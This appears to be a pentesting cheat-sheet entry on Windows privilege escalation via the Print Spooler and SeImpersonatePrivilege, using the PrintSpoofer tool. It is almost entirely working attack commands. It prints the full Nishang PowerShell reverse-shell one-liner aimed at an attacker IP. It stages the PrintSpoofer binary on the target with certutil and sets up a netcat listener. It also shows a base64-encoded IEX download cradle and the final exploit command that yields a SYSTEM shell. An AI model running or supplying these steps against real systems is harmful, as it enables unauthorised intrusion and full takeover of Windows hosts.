PRIMARY CATEGORY → PRINT SPOOLER SERVICE
Theory
This technique can be leveraged to achieve Privilege Escalation from LOCAL SERVICE or NETWORK SERVICE to SYSTEM when the SeImpersonatePrivilege is enabled in Access Token of the current Logon Session
Abusing for LPE - Windows
Getting the Reverse Shell Script
Downloading the Code Snippet
curl --silent --location --request GET "https://github.com/samratashok/nishang/raw/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1" --output rev.ps1Editing as follows
Code Snippet
$client = New-Object System.Net.Sockets.TCPClient('<ATTACKER_IP>',<LISTENING_PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Downloading and Transferring the PrintSpoofer Binary to the Target
Downloading the Binary
curl --silent --location --request GET "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" --output printspooferx64.exeTransferring the Binary to the Target
- From the Attacker ⚔️
python3 -m http.server <PORT>- From the Target 🎯
mkdir C:\Windows\Temp\PE
cd C:\Windows\Temp\PEcertutil.exe -urlcache -split -f http://<ATTACKER>:<PORT>/printspooferx64.exeSetting up an HTTP Server
python3 -m http.server 8080Setting up a Netcat Listener for the Rev. Shell
nc -nlvp <LISTENING_PORT>Command Encoding
From the Attacker⚔️
echo -n "IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>:<PORT>/rev.ps1')" | iconv --from-code UTF-8 --to-code UTF-16LE | base64 -w 0 ; echoRunning the Exploit
From the Target 🎯
.\printspooferx64.exe -c 'powershell.exe -EncodedCommand <BASE64_STRING>'References
PrintSpoofer - Abusing Impersonation Privilege on Windows 10 and WS 2019